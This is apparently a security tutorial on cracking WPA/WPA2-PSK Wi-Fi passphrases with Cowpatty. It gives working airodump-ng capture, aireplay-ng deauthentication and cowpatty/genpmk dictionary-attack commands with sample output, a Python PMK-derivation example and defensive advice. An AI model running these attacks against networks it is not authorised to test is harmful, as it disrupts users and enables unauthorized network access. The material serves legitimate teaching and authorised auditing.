Cracking WPA-PSK Wi-Fi Passwords with Cowpatty

Crack WPA/WPA2 Wi-Fi passwords using Cowpatty with captured handshakes and wordlists. Full command guide and output explained.

When it comes to Wi-Fi security assessments, especially targeting WPA-PSK (Wi-Fi Protected Access Pre-Shared Key) networks, one classic and lightweight tool stands out: Cowpatty. Though overshadowed by more advanced tools like Hashcat, Cowpatty is still a valuable educational and reconnaissance tool for understanding how WPA handshakes and password cracking work.

In this article, we’ll dive deep into what Cowpatty is, how it works, its practical usage, command breakdowns, expected outputs, and real-world scenarios. By the end, you’ll have a clear, professional grasp of Cowpatty’s workflow.

What is Cowpatty?

Cowpatty is a command-line tool that recovers WPA/WPA2-PSK passphrases offline from a captured 4-way handshake. It performs dictionary attacks, either hashing each wordlist entry on the fly or reading precomputed PMKs.

Cowpatty was developed by Joshua Wright and is included in most security distros like Kali Linux and Parrot OS.

How WPA-PSK Cracking Works

Before diving into Cowpatty, let’s quickly understand the WPA-PSK cracking process:

  1. Capture the 4-way handshake between a client and the access point (AP).
  2. Extract the handshake from a .cap or .pcap file.
  3. Use the SSID and handshake to compute a Pairwise Master Key (PMK).
  4. Derive the Pairwise Transient Key (PTK) and validate against the captured handshake.
  5. Try password guesses (dictionary) until a match is found.

Cowpatty automates steps 3–5 using the captured handshake and a wordlist.

Installing Cowpatty

On Kali Linux, Cowpatty is preinstalled. If not, you can install it using:

sudo apt update
sudo apt install cowpatty

Verify installation:

cowpatty -h

Step-by-Step: Cracking WPA-PSK with Cowpatty

Step 1: Capture the WPA 4-Way Handshake

Use airodump-ng to capture the handshake (Cowpatty cannot capture traffic itself).

sudo airodump-ng wlan0mon --bssid 00:11:22:33:44:55 -c 6 -w wpa_handshake

  • --bssid: Target access point's MAC address.
  • -c: Channel.
  • -w: Write capture file (wpa_handshake.cap will be created).

Wait for a client to connect, or deauthenticate a client to force reauthentication:

sudo aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon

Now you should have a .cap file with the 4-way handshake.

Step 2: Crack the Password Using Cowpatty

Basic Usage:

cowpatty -f wordlist.txt -r wpa_handshake.cap -s MyWiFi

Command Breakdown:

  • -f wordlist.txt → Path to the dictionary file with password guesses.

  • -r wpa_handshake.cap → The captured 4-way handshake in .cap format.

  • -s MyWiFi → SSID (Wi-Fi name) of the target network.

Sample Output:

Cowpatty 4.6 - WPA-PSK dictionary attack.  

Collected all necessary data to mount the attack.  

Starting dictionary attack...  
104 keys tested (0.37 k/s)  

Key found!  
The PSK is "password123"  

107 passphrases tested in 3.29 seconds: 32.54 passphrases/second

This means Cowpatty found the correct passphrase after testing the dictionary.

Optional: Speed Up with Precomputed PMK File

If you’re attacking the same SSID repeatedly, you can precompute PMKs using genpmk.

Step 1: Create the PMK Hash File

genpmk -f wordlist.txt -d mypmkfile -s MyWiFi

Breakdown:

  • -f: Dictionary file.
  • -d: Output file to store precomputed hashes.
  • -s: SSID.

This will compute PMKs based on each word and store them for faster cracking.

Step 2: Use Cowpatty with Precomputed PMK

cowpatty -d mypmkfile -r wpa_handshake.cap -s MyWiFi

This is significantly faster than computing on the fly.

Sample Output (Using PMK):

Using precomputed hash file: mypmkfile  
Loaded 10000 passphrases from hash file  
Starting attack...  
Passphrase found: "password123"
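
Added example (not from the original article or from Cowpatty's source): the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, which is why a table precomputed for one SSID is useless against another and why passphrase length dominates search time. The wordlist, the second SSID MyWiFi-Lab7, the in-memory table (a simplified stand-in for a genpmk hash file) and the guess rate are constructed assumptions.

```python
import hashlib

WPA_ITERATIONS = 4096   # fixed by the WPA/WPA2-PSK key derivation
PMK_LEN = 32            # 256-bit Pairwise Master Key


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), WPA_ITERATIONS, PMK_LEN)


def build_pmk_table(words, ssid):
    """Precompute PMK -> passphrase for ONE SSID (simplified stand-in, an assumption)."""
    table = {}
    for word in words:
        if 8 <= len(word) <= 63:   # out-of-range guesses can never be valid
            table[derive_pmk(word, ssid)] = word
    return table


def table_covers(table, passphrase, ssid):
    """Would a table precomputed for some SSID expose this network's passphrase?"""
    return derive_pmk(passphrase, ssid) in table


def years_to_exhaust(alphabet_size, length, guesses_per_second):
    """Worst-case time to try every passphrase of a given shape at a given rate."""
    return alphabet_size ** length / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    # Constructed lab values matching the article's test network.
    wordlist = ["letmein", "password123", "qwertyuiop"]
    table = build_pmk_table(wordlist, "MyWiFi")
    print("usable entries:", len(table))   # "letmein" is shorter than 8 characters
    print("same SSID exposed:", table_covers(table, "password123", "MyWiFi"))
    print("other SSID exposed:", table_covers(table, "password123", "MyWiFi-Lab7"))
    # Assumed rate of one million guesses per second, 16 random alphanumerics.
    print("years for 62^16:", years_to_exhaust(62, 16, 1_000_000))
```

The same weak passphrase is found under the SSID the table was built for and missed under a different one, so a non-default SSID removes the precomputation shortcut while a long random passphrase removes the dictionary attack itself.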

Tips and Notes

  • Cowpatty only supports WPA/WPA2-PSK, not Enterprise.
  • It does not support GPU acceleration (use Hashcat or Aircrack-ng for that).
  • You must know the correct SSID or the attack won’t work.
  • A valid 4-way handshake is essential — check with Wireshark or tools like aircrack-ng.

Limitations of Cowpatty

| Limitation | Description |
| - | - |
| Slow Cracking | No GPU support; CPU-based only |
| Dictionary Only | No rule-based or hybrid attacks |
| SSID Specific | PMKs are unique per SSID |
| No Capture | Can't sniff handshakes itself |

Testing in a Lab Environment

Always use Cowpatty in a controlled lab with test networks you own. Unauthorized Wi-Fi cracking is illegal and unethical.

Set up your test network:

  1. Create a WPA2-PSK network named MyWiFi with password password123.
  2. Capture handshake using airodump-ng.
  3. Use Cowpatty with a wordlist containing password123.

Real-World Use Case

Imagine you're a penetration tester performing a Wi-Fi security audit for a client. The target office uses a weak pre-shared key. You:

  1. Use airodump-ng to capture a handshake.
  2. Try Cowpatty with their default password list.
  3. Crack it in seconds.
  4. Recommend a complex passphrase and enterprise-level WPA2 authentication.

Summary

| Step | Description |
| - | - |
| 1. Capture Handshake | Use airodump-ng and aireplay-ng |
| 2. Run Cowpatty | With or without precomputed PMKs |
| 3. Validate Success | Look for “Key found!” |
| 4. Report & Secure | Suggest better Wi-Fi security practices |

Conclusion

Cowpatty is a simple yet effective tool for understanding the fundamentals of WPA/WPA2 password cracking. While not the fastest or most powerful, it plays a crucial educational role in Wi-Fi security analysis.

If you're learning Wi-Fi penetration testing or teaching students about WPA vulnerabilities, Cowpatty offers a focused, realistic, and hands-on way to demonstrate how insecure passwords can be brute-forced using captured handshakes.